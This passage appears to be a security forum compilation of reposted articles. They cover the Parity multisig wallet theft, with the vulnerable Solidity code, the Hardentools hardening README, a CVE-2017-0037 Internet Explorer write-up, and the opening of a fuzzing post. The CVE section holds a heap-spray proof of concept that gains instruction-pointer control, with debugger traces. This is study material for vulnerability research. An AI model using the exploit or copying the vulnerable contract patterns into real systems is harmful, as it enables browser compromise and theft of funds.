Having sounded the alarm bells, a group of benevolent white-hat hackers from the Ethereum community rapidly organized. They analyzed the attack and realized that there was no way to reverse the thefts, yet many more wallets were vulnerable. Time was of the essence, so they saw only one available option: hack the remaining wallets before the attacker did. By exploiting the same vulnerability, the white-hats hacked all of the remaining at-risk wallets and drained their accounts, effectively preventing the attacker from reaching any of the remaining $77,000,000.

Yes, you read that right. To prevent the hacker from robbing any more banks, the white-hats wrote software to rob all of the remaining banks in the world. Once the money was safely stolen, they began the process of returning the funds to their respective account holders. The people who had their money saved by this heroic feat are now in the process of retrieving their funds.

It’s an extraordinary story, and it has significant implications for the world of cryptocurrencies. It’s important to understand that this exploit was not a vulnerability in Ethereum or in Parity itself. Rather, it was a vulnerability in the default smart contract code that the Parity client gives the user for deploying multi-signature wallets.

This is all pretty complicated, so to make the details of this clear for everyone, this post is broken into three parts:

1. What exactly happened? An explanation of Ethereum, smart contracts, and multi-signature wallets.
2. How did they do it? A technical explanation of the attack (specifically for programmers).
3. What now? The attack’s implications about the future and security of smart contracts.

If you are familiar with Ethereum and the crypto world, you can skip to the second section.

1. What exactly happened?

There are three building blocks to this story: Ethereum, smart contracts, and digital wallets.

Ethereum is a digital currency invented in 2013 — a full 4 years after the release of Bitcoin. It has since grown to be the second largest digital currency in the world by market cap — $20 billion, compared to Bitcoin’s $40 billion. Like all cryptocurrencies, Ethereum is a descendant of the Bitcoin protocol, and improves on Bitcoin’s design. But don’t be fooled: though it is a digital currency like Bitcoin, Ethereum is much more powerful. While Bitcoin uses its blockchain to implement a ledger of monetary transactions, Ethereum uses its blockchain to record state transitions in a gigantic distributed computer. Ethereum’s corresponding digital currency, ether, is essentially a side effect of powering this massive computer. To put it another way, Ethereum is literally a computer that spans the entire world. Anyone who runs the Ethereum software on their computer is participating in the operations of this world-computer, the Ethereum Virtual Machine (EVM).
Because the EVM was designed to be Turing-complete (ignoring gas limits), it can do almost anything that can be expressed in a computer program. Let me be emphatic: this is crazy stuff. The crypto world is ebullient about the potential of Ethereum, which has seen its value skyrocket in the last 6 months. The developer community has rallied behind it, and there’s a lot of excitement about what can be built on top of the EVM — and this brings us to smart contracts.

Smart contracts are simply computer programs that run on the EVM. In many ways, they are like normal contracts, except they don’t need lawyers or judges to interpret them. Instead, they are compiled to bytecode and interpreted unambiguously by the EVM. With these programs, you can (among other things) programmatically transfer digital currency based solely on the rules of the contract code. Of course, there are things normal contracts do that smart contracts can’t — smart contracts can’t easily interact with things that aren’t on the blockchain. But smart contracts can also do things that normal contracts can’t, such as enforce a set of rules entirely through unbreakable cryptography.

This leads us to the notion of wallets. In the world of digital currencies, wallets are how you store your assets. You gain access to your wallet using essentially a secret password, also known as your private key (simplified a bit). There are many different types of wallets that confer different security properties, such as withdrawal limits. One of the most popular types is the multi-signature wallet. In a multi-signature wallet, there are several private keys that can unlock the wallet, but just one key is not enough to unlock it. If your multi-signature wallet has 3 keys, for example, you can specify that at least 2 of the 3 keys must be provided to successfully unlock it. This means that if you, your father, and your mother are each signatories on this wallet, even if a criminal hacked your mother and stole her private key, they could still not access your funds. This leads to much stronger security guarantees, so multi-sigs are a standard in wallet security. This is the type of wallet the hacker attacked.

So what went wrong? Did they break the private keys? Did they use a quantum computer, or some kind of cutting-edge factoring algorithm? Nope, all the cryptography was sound. The exploit was almost laughably simple: they found a programmer-introduced bug in the code that let them re-initialize the wallet, almost like restoring it to factory settings. Once they did that, they were free to set themselves as the new owners, and then walk out with everything.

2. How did this happen?

What follows is a technical explanation of exactly what happened. If you’re not a developer, feel free to skip to the next section, since this is going to be programming-heavy.

Ethereum has a fairly unique programming model. On Ethereum, you write code by publishing contracts (which you can think of as objects), and transactions are executed by calling methods on these objects to mutate their state. In order to run code on Ethereum, you need to first deploy the contract (the deployment is itself a transaction), which costs a small amount of Ether. You then need to call methods on the contract to interact with it, which costs more Ether. As you can imagine, this incentivizes a programmer to optimize their code, both to minimize transactions and minimize computation costs. One way to reduce costs is to use libraries.
By making your contract call out to a shared library that was deployed at a previous time, you don’t have to re-deploy any shared code. In Ethereum, keeping your code DRY will directly save you money. The default multi-sig wallet in Parity did exactly this. It held a reference to a shared external library which contained wallet initialization logic. This shared library is referenced by the public key of the library contract.

// FIELDS
address constant _walletLibrary = 0xa657491c1e7f16adb39b9b60e87bbb8d93988bc3;

The library is called in several places, via an EVM instruction called DELEGATECALL, which does the following: for whatever method that calls DELEGATECALL, it will call the same method on the contract you're delegating to, but using the context of the current contract. It's essentially like a supercall, except without the inheritance part. (The equivalent in JavaScript would be OtherClass.functionName.apply(this, args).) Here’s an example of this in their multi-sig wallet: the isOwner method just delegates to the shared wallet library's isOwner method, using the current contract's state:

function isOwner(address _addr) constant returns (bool) {
  return _walletLibrary.delegatecall(msg.data);
}

This is all innocent enough. The multi-sig wallet itself contained all of the right permission checks, and they were sure to rigorously enforce authorization on all sensitive actions related to the wallet’s state. But they made one critical mistake. Solidity allows you to define a “fallback method.” This is the method that gets called when there’s no method that matches a given method name. You define it by not giving it a name:

function() {
  // do stuff here for all unknown methods
}

The Parity team decided to let any unknown method that sent Ether to the contract just default to depositing the sent Ether.

function() payable {
  // payable is just a keyword that means this method can receive/pay Ether
  if (msg.value > 0) {
    // just being sent some cash?
    Deposit(msg.sender, msg.value);
  }
  throw;
}

But they took it a step further, and herein was their critical mistake. Below is the actual code that was attacked.

function() payable {
  // just being sent some cash?
  if (msg.value > 0)
    Deposit(msg.sender, msg.value);
  else if (msg.data.length > 0)
    _walletLibrary.delegatecall(msg.data);
}

Basically:

- If the method name is not defined on this contract…
- And there’s no ether being sent in the transaction…
- And there is some data in the message payload…

Then it will call the exact same method if it’s defined in _walletLibrary, but in the context of this contract. Using this, the attacker called a method called initWallet(), which was not defined on the multisig contract but was defined in the shared wallet library:

function initWallet(address[] _owners, uint _required, uint _daylimit) {
  initDaylimit(_daylimit);
  initMultiowned(_owners, _required);
}

Which calls the initMultiowned method...

function initMultiowned(address[] _owners, uint _required) {
  m_numOwners = _owners.length + 1;
  m_owners[1] = uint(msg.sender);
  m_ownerIndex[uint(msg.sender)] = 1;
  for (uint i = 0; i < _owners.length; ++i) {
    m_owners[2 + i] = uint(_owners[i]);
    m_ownerIndex[uint(_owners[i])] = 2 + i;
  }
  m_required = _required;
}

Do you see what just happened there? The attacker essentially reinitialized the contract by delegating through the library method, overwriting the owners on the original contract. They and whatever array of owners they supply as arguments will be the new owners.
Given that they now control the entire wallet, they can trivially extract the remainder of the balance. And that’s precisely what they did.

The initWallet: https://etherscan.io/tx/0x707aabc2f24d756480330b75fb4890ef6b8a26ce0554ec80e3d8ab105e63db07
The transfer: https://etherscan.io/tx/0x9654a93939e98ce84f09038b9855b099da38863b3c2e0e04fd59a540de1cb1e5

So what was ultimately the vulnerability? You could argue there were two. First, the initWallet and initMultiowned in the wallet library were not marked as internal (this is like a private method, which would prevent this delegated call), and those methods did not check that the wallet wasn't already initialized. Either check would've made this hack impossible. The second vulnerability was the raw delegateCall. You can think of this as equivalent to a raw eval statement, running on a user-supplied string. In an attempt to be succinct, this contract used metaprogramming to proxy potential method calls to an underlying library. The safer approach here would be to whitelist specific methods that the user is allowed to call. The trouble, of course, is that this is more expensive in gas costs (since it has to evaluate more conditionals). But when it comes to security, we probably have to get over this concern when writing smart contracts that move massive amounts of money.

So that was the attack. It was a clever catch, but once you point it out, it seems almost elementary. The attacker then jumped on this vulnerability for three of the largest wallets they could find — but judging from the transaction times, they were doing this entirely manually. The white-hat group was doing this at scale using scripts, and that’s why they were able to beat the attacker to the punch. Given this, it’s unlikely that the attacker was very sophisticated in how they planned their attack.

You might ask the question though — why don’t they just roll back this hack, like they did with the DAO hack? Unfortunately that’s not really possible. The DAO hack was unique in that when the attacker drained the DAO into a child DAO, the funds were frozen for many days inside a smart contract before they could be released to the attacker. This prevented any of the stolen funds from going into circulation, so the stolen Ether was effectively siloed. This gave the Ethereum community plenty of time to conduct a public quorum about how to deal with the attack. In this attack, the attacker immediately stole the funds and could start spending them. A hard fork would be impractical — what do you do about all of the transactions that occur downstream? What about the people who innocently traded assets with the attacker? Once the ether they’ve stolen gets laundered and enters general circulation, it’s like counterfeit bills circulating in the economy — it’s easy to stop when it’s all in one briefcase, but once everyone’s potentially holding a counterfeit bill, you can’t really turn back the clock anymore. So the transaction won’t get reversed. The $31M loss stands. It’s a costly, but necessary lesson. So what should we take away from this?

3. What does this attack mean for Ethereum?

There are several important takeaways here. First, remember, this was not a flaw in Ethereum or in smart contracts in general. Rather, it was a developer error in a particular contract. So who were the crackpot developers who wrote this? They should’ve known better, right? The developer here was Gavin Wood, one of the co-creators of Ethereum, and the inventor of Solidity, the smart contract programming language.
The code was also reviewed by other Parity contributors. This is basically the highest standard of programming that exists in the Ethereum ecosystem. Gavin is human. He made a mistake. And so did the reviewers who audited his code.

I’ve read some comments on Reddit and HackerNews along the lines of: “What an obvious mistake! How was it even possible they missed this?” (Ignoring that the “obvious” vulnerability was introduced in January and only now discovered.) When I see responses like this, I know the people commenting are not professional developers. For a serious developer, the reaction is instead: damn, that was a dumb mistake. I’m glad I wasn’t the one who made it.

Mistakes of this sort are routinely made in programming. All programs carry the risk of developer error. We have to throw off the mindset of “if they were just more careful, this wouldn’t have happened.” At a certain scale, carefulness is not enough. As programs scale to non-trivial complexity, you have to start taking it as a given that programs are probably not correct. No amount of human diligence or testing is sufficient to prevent all possible bugs. Even organizations like Google or NASA make programming mistakes, despite the extreme rigor they apply to their most critical code.

We would do well to take a page from site reliability practices at companies like Google and Airbnb. Whenever there’s a production bug or outage, they do a postmortem analysis and distribute it within the company. In these postmortems, there is always a principle of never blaming individuals. Blaming mistakes on individuals is pointless, because all programmers, no matter how experienced, have a nonzero likelihood of making a mistake. Instead, the purpose of a postmortem is to identify what in the process allowed that mistake to get deployed. The problem was not that Gavin Wood forgot to add internal to the wallet library, or that he did a raw delegateCall without checking what method was being called. The problem is that his programming toolchain allowed him to make these mistakes. As the smart contract ecosystem evolves, it has to evolve in the direction of making these mistakes harder, and that means making contracts secure by default. This leads me to my next point.

Strength is a weakness when it comes to programming languages. The stronger and more expressive a programming language is, the more complex its code becomes. Solidity is a very complex language, modeled to resemble Java. Complexity is the enemy of security. Complex programs are more difficult to reason about and harder to identify edge cases for. I think that languages like Viper (maintained by Vitalik Buterin) are a promising step in this direction. Viper includes by default basic security mechanisms, such as bounded looping constructs and no integer overflows, and prevents other basic bugs that developers shouldn’t have to reason about. The less the language lets you do, the easier it is to analyze and prove properties of a contract. Security is hard because the only way to prove a positive statement like “this contract is secure” is to disprove every possible attack vector: “this contract cannot be re-initialized,” “its funds cannot be accessed except by the owners,” etc. The fewer possible attack vectors you have to consider, the easier it is to develop a secure contract. A simpler programming model also allows things like formal verification and automatic test generation.
These are areas under active research, but just as smart contracts have incorporated cutting-edge cryptography, they also should start incorporating the leading edge of programming language design. There is a bigger lesson here too. Most of the programmers who are getting into this space, myself included, come from a web development background, and the blockchain toolchain is designed to be familiar for web developers. Solidity has achieved tremendous adoption in the developer community because of its familiarity to other forms of programming. In a way, this may end up being its downfall. The problem is, blockchain programming is fundamentally different from web development. Let me explain. Before the age of the client-server web model, most programming was done for packaged consumer software or on embedded systems. This was before the day of automatic software updates. In these programs, a shipped product was final — you released one form of your software every 6 months, and if there was a bug, that bug would have to stand until the next release. Because of this longer development cycle, all software releases were rigorously tested under all conceivable circumstances. Web development is far more forgiving. When you push bad code to a web server, it’s not a big deal if there’s a critical mistake — you can just roll back the code, or roll forward with a fix, and all is well because you control the server. Or if the worst happens and there’s an active breach or a data leak, you can always stop the bleeding by shutting off your servers and disconnecting yourself from the network. These two development models are fundamentally different. It’s only out of something like web development that you can get the motto “move fast and break things.” Most programmers today are trained on the web development model. Unfortunately, the blockchain security model is more akin to the older model. In blockchain, code is intrinsically unrevertible. Once you deploy a bad smart contract, anyone is free to attack it as long and hard as they can, and there’s no way to take it back if they get to it first. Unless you build intelligent security mechanisms into your contracts, if there’s a bug or successful attack, there’s no way to shut off your servers and fix the mistake. Being on Ethereum by definition means everyone owns your server. A common saying in cybersecurity is “attack is always easier than defense.” Blockchain sharply multiplies this imbalance. It’s far easier to attack because you have access to the code of every contract, know how much money is in it, and can take as long as you want to try to attack it. And once your attack is successful, you can potentially steal all of the money in the contract. Imagine that you were deploying software for vending machines. But instead of a bug allowing you to simply steal candy from one machine, the bug allowed you to simultaneously steal candy from every machine in the world that employed this software. Yeah, that’s how blockchain works. In the case of a successful attack, defense is extremely difficult. The white-hats in the Parity hack demonstrated how limited their defense options were — there was no way to secure or dismantle the contracts, or even to hack back the stolen money; all they could do was hack the remaining vulnerable contracts before the attacker did. This might seem to spell a dark future. But I don’t think this is a death knell for blockchain programming. Rather, it confirms what everyone already knows: this ecosystem is young and immature. 
It’s going to take a lot of work to develop the training and discipline to treat smart contracts the way that banks treat their ATM software. But we’re going to have to get there for blockchain to be successful in the long run. This means not just programmers maturing and getting more training. It also means developing tools and languages that make all of this easier, and give us rigorous guarantees about our code.

It’s still early. Ethereum is a work in progress, and it’s changing rapidly. You should not treat Ethereum as a bank or as a replacement for financial infrastructure. And certainly you should not store any money in a hot wallet that you’re not comfortable losing. But despite all that, I still think Ethereum is going to win in the long run. And here’s why: the developer community in Ethereum is what makes it so powerful. Ethereum will not live or die because of the money in it. It will live or die based on the developers who are fighting for it.

The league of white-hats who came together and defended the vulnerable wallets didn’t do it for money. They did it because they believe in this ecosystem. They want Ethereum to thrive. They want to see their vision of the future come true. And after all the speculation and the profiteering, it’s ultimately these people who are going to usher the community into its future. They are fundamentally why Ethereum will win in the long run — or if they abandon Ethereum, their abandonment will be why it loses.

This attack is important. It will shake people up. It will force the community to take a long, hard look at security best practices. It will force developers to treat smart contract programming with far more rigor than they currently do. But this attack hasn’t shaken the strength of the builders who are working on this stuff. So in that sense it’s a temporary setback. In the end, attacks like this are good for the community to grow up. They call you to your senses and force you to keep your eyes open. It hurts, and the press will likely make a mess of the story. But every wound makes the community stronger, and gets us closer to really deeply understanding the technology of blockchain — both its dangers, and its amazing potential.

P.S. If you’re a dev and you want to learn more about smart contract security, this is a really good resource.

Sursa: https://medium.freecodecamp.org/a-hacker-stole-31m-of-ether-how-it-happened-and-what-it-means-for-ethereum-9e5dc29e33ce
  6. Hardentools

Hardentools is a collection of simple utilities designed to disable a number of "features" exposed by operating systems (Microsoft Windows, for now) and primary consumer applications. These features, commonly intended for enterprise customers, are generally useless to regular users and instead pose a danger, as they are very commonly abused by attackers to execute malicious code on a victim's computer. The intent of this tool is to simply reduce the attack surface by disabling the low-hanging fruit. Hardentools is intended for individuals at risk who might want an extra level of security at the price of some usability. It is not intended for corporate environments.

WARNING: This is just an experiment; it is not meant for public distribution yet. Also, this tool disables a number of features, including in Microsoft Office, Adobe Reader, and Windows, that might cause malfunctions in certain applications. Use this at your own risk.

Bear in mind that after running Hardentools you won't be able, for example, to do complex calculations with Microsoft Office Excel or use the command-line terminal, but those are pretty much the only considerable "downsides" of having a slightly safer Windows environment. Before deciding to use it, make sure you read this document thoroughly and understand that yes, something might break. In case you experience malfunctions as a result of the modifications implemented by this tool, please do let us know. When you're ready, you can find the latest download here.

How to use it

Once you double-click on the icon, depending on your Windows security settings, you should be prompted with a User Account Control dialog asking you to confirm that Hardentools is allowed to run. Click "Yes". You will then see the main Hardentools window. It's very simple: you just click the "Harden" button, and the tool will change your Windows configuration to disable a set of risky features. Once completed, you will be asked to restart your computer for all the changes to take full effect.

In case you wish to restore the original settings and revert the changes Hardentools made (for example, if you need to use cmd.exe), you can simply re-run the tool; instead of a "Harden" button you will be presented with a "Restore" button. Similarly, click it and wait for the modifications to be reverted. In the future, we will add the ability to select or deselect the individual modifications Hardentools is configured to make.

Please note: the modifications made by Hardentools apply exclusively to the Windows user account used to run the tool. If you want Hardentools to change settings for other Windows users as well, you will have to run it while logged in as each of those users.

What this tool does NOT

It does NOT prevent software from being exploited. It does NOT prevent the abuse of every available risky feature.

It is NOT an antivirus. It does not protect your computer. It doesn't identify, block, or remove any malware.

It does NOT prevent the changes it implements from being reverted. If malicious code runs on the system and is able to restore them, the premise of the tool is defeated, isn't it?

Disabled Features

Generic Windows Features

Disable Windows Script Host. Windows Script Host allows the execution of VBScript and JavaScript files on Windows operating systems. This is very commonly used by regular malware (such as ransomware) as well as targeted malware.

Disable AutoRun and AutoPlay. Disables AutoRun / AutoPlay for all devices. For example, this should prevent applications from automatically executing when you plug a USB stick into your computer.

Disable powershell.exe, powershell_ise.exe and cmd.exe execution via Windows Explorer. You will not be able to use the terminal, and it should prevent the use of PowerShell by malicious code trying to infect the system.

Set User Account Control (UAC) to always ask for permission (even on configuration changes only) and to use "secure desktop".

Disable file extensions mainly used for malicious purposes. Disables the ".hta", ".js", ".JSE", ".WSH", ".WSF", ".scr", ".vbs" and ".pif" file extensions for the current user (and for system-wide defaults, which is only relevant for newly created users).

Microsoft Office

Disable macros. Macros are at times used by Microsoft Office users to script and automate certain activities, especially calculations with Microsoft Excel. However, macros are currently a security plague, and they are widely used as a vehicle for compromise. With Hardentools, macros are disabled and the "Enable this Content" notification is disabled too, to prevent users from being tricked.

Disable OLE object execution. Microsoft Office applications are able to embed so-called "OLE objects" and execute them, at times also automatically (for example through PowerPoint animations). Windows executables, such as spyware, can also be embedded and executed as an object. This is also a security disaster which we have observed used time and time again, particularly in attacks against activists in repressed regions. Hardentools entirely disables this functionality.

Disable ActiveX. Disables ActiveX controls for all Office applications.

Acrobat Reader

Disable JavaScript in PDF documents. Acrobat Reader allows JavaScript code to be executed from within PDF documents. This is widely abused for exploitation and malicious activity.

Disable execution of objects embedded in PDF documents. Acrobat Reader also allows embedded objects to be executed by opening them. This would normally raise a security alert, but given that legitimate uses of this are rare and limited, Hardentools disables this.

Authors

This tool is developed by Claudio Guarnieri, Mariano Graziano and Florian Probst.

Sursa: https://github.com/securitywithoutborders/hardentools
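To make one of the steps above concrete: disabling Windows Script Host is conventionally done by setting the Enabled value to 0 under the current user's "Windows Script Host\Settings" registry key. The following C sketch applies just that single hardening step; it is an illustration of the mechanism, not Hardentools' actual implementation (the tool itself is written in Go and covers many more settings).

#include <windows.h>
#include <stdio.h>

/* Disable Windows Script Host for the current user by setting
 * HKCU\Software\Microsoft\Windows Script Host\Settings\Enabled = 0.
 * This is the commonly documented WSH kill switch; illustrative only.
 * Build with: cl wsh_off.c advapi32.lib */
int main(void)
{
    HKEY hKey;
    DWORD disabled = 0;
    LONG rc;

    rc = RegCreateKeyExW(HKEY_CURRENT_USER,
                         L"Software\\Microsoft\\Windows Script Host\\Settings",
                         0, NULL, REG_OPTION_NON_VOLATILE,
                         KEY_SET_VALUE, NULL, &hKey, NULL);
    if (rc != ERROR_SUCCESS) {
        fprintf(stderr, "RegCreateKeyExW failed: %ld\n", rc);
        return 1;
    }

    rc = RegSetValueExW(hKey, L"Enabled", 0, REG_DWORD,
                        (const BYTE *)&disabled, sizeof(disabled));
    RegCloseKey(hKey);

    if (rc != ERROR_SUCCESS) {
        fprintf(stderr, "RegSetValueExW failed: %ld\n", rc);
        return 1;
    }

    puts("Windows Script Host disabled for the current user.");
    return 0;
}

Restoring is the mirror image of this: set Enabled back to 1 (or delete the value), which is essentially what the "Restore" button automates for every modification the tool made.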
  7. CVE to PoC - CVE-2017-0037

17 JULY 2017

CVE-2017-0037 Internet Explorer

"Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote attackers to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element."

The PoC

The vulnerability was found by Ivan Fratric of Google Project Zero. The following is the PoC he provided:

<!-- saved from url=(0014)about:internet -->
<style>
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
</style>
<script>
function boom() {
  document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
  th1.align = "right";
}
</script>
<body onload="setInterval(boom,100)">
<table cellspacing="0">
<tr class="class1">
<th id="th1" colspan="5" width=0></th>
<th class="class2" width=0><div class="class2"></div></th>

With a few notes:

The PoC crashes in MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement when reading from address 0000007800000070 [...] Edge should crash when reading the same address while the 32-bit IE tab process should crash in the same place but when reading a lower address. [...]

Let's take a look at the code around the rip of the crash.

00007ffe`8f330a51 488bcd          mov  rcx,rbp
00007ffe`8f330a54 e8873c64ff      call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a59 48833800        cmp  qword ptr [rax],0 ds:00000078`00000070=????????????????
00007ffe`8f330a5d 743d            je   MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c)
00007ffe`8f330a5f 488bcd          mov  rcx,rbp
00007ffe`8f330a62 e8793c64ff      call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a67 488b30          mov  rsi,qword ptr [rax]
00007ffe`8f330a6a 488b06          mov  rax,qword ptr [rsi]
00007ffe`8f330a6d 488bb848030000  mov  rdi,qword ptr [rax+348h]
00007ffe`8f330a74 488bcf          mov  rcx,rdi
00007ffe`8f330a77 ff155b95d700    call qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)]
00007ffe`8f330a7d 488bce          mov  rcx,rsi
00007ffe`8f330a80 ffd7            call rdi

On 00007ffe`8f330a51, rcx is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called, which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns, and the values can be controlled by an attacker (with some limitations).

On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory. However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the first th element. Let's see what happens if an attacker can point rax to memory he/she controls.

Assuming an attacker can pass the check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi.
A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80. Sounds pretty easy to control that CMP condition if we can perform a heap spray and point EAX to some memory location we control.

Control EIP

First of all, let's confirm that the PoC works:

(654.eec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000038 ebx=049f4758 ecx=049f4758 edx=00000002 esi=00000064 edi=5a0097f0
eip=59a15caf esp=0399bd68 ebp=0399bd94 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4:
59a15caf 833800 cmp dword ptr [eax],0 ds:002b:00000038=????????

I played a little bit with the width of that "th" element, as suggested by Ivan, and found that a value of "2000000" allows us to move the value of EAX to a controlled memory location in the heap spray:

0:018> bu 59a15caf
0:018> g
[...]
Breakpoint 0 hit
eax=03bd86d4 ebx=03bd86c4 ecx=03bd86c4 edx=00000002 esi=00000064 edi=5a005320
eip=59a15caf esp=03f1c1d8 ebp=03f1c204 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4:
59a15caf 833800 cmp dword ptr [eax],0 ds:002b:03bd86d4=a0949807

(skip the first break)

0:007> g
Breakpoint 0 hit
eax=0bebc2d8 ebx=04be9ae0 ecx=04be9ae0 edx=00000002 esi=00000064 edi=5a0097f0
eip=59a15caf esp=03f1c1d8 ebp=03f1c204 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4:
59a15caf 833800 cmp dword ptr [eax],0 ds:002b:0bebc2d8=0e0e0e0e

As expected, EAX points to some valid (and controllable) memory location.
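The dereference chain stepped through below is easier to follow when written as C. The sketch that follows is a hypothetical reconstruction: the struct names are invented, and only the 0x1A4 slot offset is taken from the disassembly.

#include <stdio.h>
#include <stddef.h>

typedef struct Object Object;

/* Hypothetical shape of what the code at 59a15cbe..59a15cd2 walks:
 * a pointer to an object whose first dword is a vftable pointer,
 * with the called slot at vftable offset 0x1A4. */
typedef struct {
    unsigned char pad[0x1A4];      /* slots before the one that is called */
    void (*fn)(Object *self);      /* loaded into edi, then "call edi"    */
} VTable;

struct Object {
    VTable *vft;                   /* first dword of the sprayed object   */
};

static void invoke(Object **spray_slot)
{
    Object *obj = *spray_slot;     /* mov ebx, dword ptr [eax]      -> 0e0e0e0e */
    VTable *vt  = obj->vft;        /* mov eax, dword ptr [ebx]      -> 0e0e0e0e */
    void (*fn)(Object *) = vt->fn; /* mov edi, dword ptr [eax+1A4h] -> 41414141 */
    fn(obj);                       /* mov ecx, ebx / call edi */
}

int main(void)
{
    (void)invoke;  /* never actually called; the layout is the point */
    /* prints 0x1A4 on a 32-bit target, matching mov edi,[eax+1A4h] */
    printf("fn slot offset: 0x%zx\n", offsetof(VTable, fn));
    return 0;
}

With the heap sprayed with 0x0e0e0e0e, every load in that chain lands inside attacker-controlled data, which is why overwriting the +1A4h slot yields EIP control.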
If the CMP condition is satisfied, the vulnerable routine tries to load the vftable of the object located at "0e0e0e0e" and calls the function at +1A4h:

59a15caf 833800       cmp  dword ptr [eax],0
59a15cb2 7448         je   MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xf1 (59a15cfc)
59a15cb4 8bcb         mov  ecx,ebx
59a15cb6 e8ec8181ff   call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::SGridBoxItem> >::Readable (5922dea7)
59a15cbb 8965f0       mov  dword ptr [ebp-10h],esp
59a15cbe 8b18         mov  ebx,dword ptr [eax]
59a15cc0 8b03         mov  eax,dword ptr [ebx]
59a15cc2 8bb8a4010000 mov  edi,dword ptr [eax+1A4h]
59a15cc8 8bcf         mov  ecx,edi
59a15cca ff15ac1f455a call dword ptr [MSHTML!__guard_check_icall_fptr (5a451fac)]
59a15cd0 8bcb         mov  ecx,ebx
59a15cd2 ffd7         call edi

Step by step:

59a15cbe 8b18         mov ebx,dword ptr [eax]      ds:002b:0bebc2d8=0e0e0e0e
59a15cc0 8b03         mov eax,dword ptr [ebx]      ds:002b:0e0e0e0e=0e0e0e0e
59a15cc2 8bb8a4010000 mov edi,dword ptr [eax+1A4h] ds:002b:0e0e0fb2=41414141
59a15cd2 ffd7         call edi {41414141}

The following is a working PoC to set EIP to 41414141:

<style>
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
</style>
<script>
function boom() {
  document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
  th1.align = "right";
}
</script>
<body onload="setInterval(boom,1000)">
<div id="hs"></div>
<script>
// Heap Spray - DEPS avoid null bytes
var hso = document.getElementById("hs");
hso.style.cssText = "display:none";
var junk = unescape("%u0e0e%u0e0e");
while (junk.length < 0x1000) junk += junk;
var rop = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
var xchg = unescape("%u4141%u4141"); // initial EIP control
var offset = 0x7c9; // to control eip
var data = junk.substring(0,offset) + xchg + rop + shellcode;
data += junk.substring(0,0x800-offset-xchg.length-rop.length-shellcode.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x350; i++) {
  var obj = document.createElement("button");
  obj.title = data.substring(0,(0x7fb00-2)/2); // 2 null bytes terminator
  hso.appendChild(obj);
}
</script>
<table cellspacing="0">
<tr class="class1">
<th id="th1" colspan="0" width=2000000></th> <!-- width should control eax contents, should land somewhere in the heap spray -->
<th class="class2" width=0><div class="class2"></div></th>

Working Exploit

It's pretty obvious: we have a memory leak and control of EIP. Chain together CVE-2017-0059 and CVE-2017-0037 and you'll have a working exploit for Windows 7 and IE11... or just wait until tomorrow for the full release.

Claudio Moletta

Sursa: https://redr2e.com/cve-to-poc-cve-2017-0037/
  8. A fuzzer and a symbolic executor walk into a cloud

POST AUGUST 2, 2016 29 COMMENTS

Finding bugs in programs is hard. Automating the process is even harder. We tackled the harder problem and produced two production-quality bug-finding systems: GRR, a high-throughput fuzzer, and PySymEmu (PSE), a binary symbolic executor with support for concrete inputs.

From afar, fuzzing is a dumb, brute-force method that works surprisingly well, and symbolic execution is a sophisticated approach, involving theorem provers that decide whether or not a program is "correct." Through this lens, GRR is the brawn while PSE is the brains. There isn't a dichotomy though — these tools are complementary, and we use PSE to seed GRR and vice versa. Let's dive in and see the challenges we faced when designing and building GRR and PSE.

GRR, the fastest fuzzer around

GRR is a high speed, full-system emulator that we use to fuzz program binaries. A fuzzing "campaign" involves executing a program thousands or millions of times, each time with a different input. The hope is that spamming a program with an overwhelming number of inputs will result in triggering a bug that crashes the program.

Note: GRR is pronounced with two fists held in the air

